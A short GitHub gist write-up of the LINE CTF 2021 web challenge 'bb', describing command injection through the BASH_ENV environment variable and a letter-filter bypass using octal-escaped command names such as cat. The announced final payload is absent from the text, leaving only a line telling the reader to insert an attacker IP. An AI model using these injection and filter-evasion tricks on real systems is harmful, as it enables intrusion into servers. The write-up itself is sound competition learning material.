Skip to content

Instantly share code, notes, and snippets.

Last active Mar 27, 2022
What would you like to do?
[LINE CTF 2021] bb


LINECTF 2021 - Web
Writeup by Payload as Super HexaGoN

BASH_ENV envrionment

We can inject some bash command line using environment BASH_ENV.

BASH_ENV=touch /tmp /bin/bash will execute touch.

Non-alphabet command

It's like 34C3 ctf's challenge. We can call cat like $'\143\141\164'

Thus, final payload is


replace to attacker ip.


Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment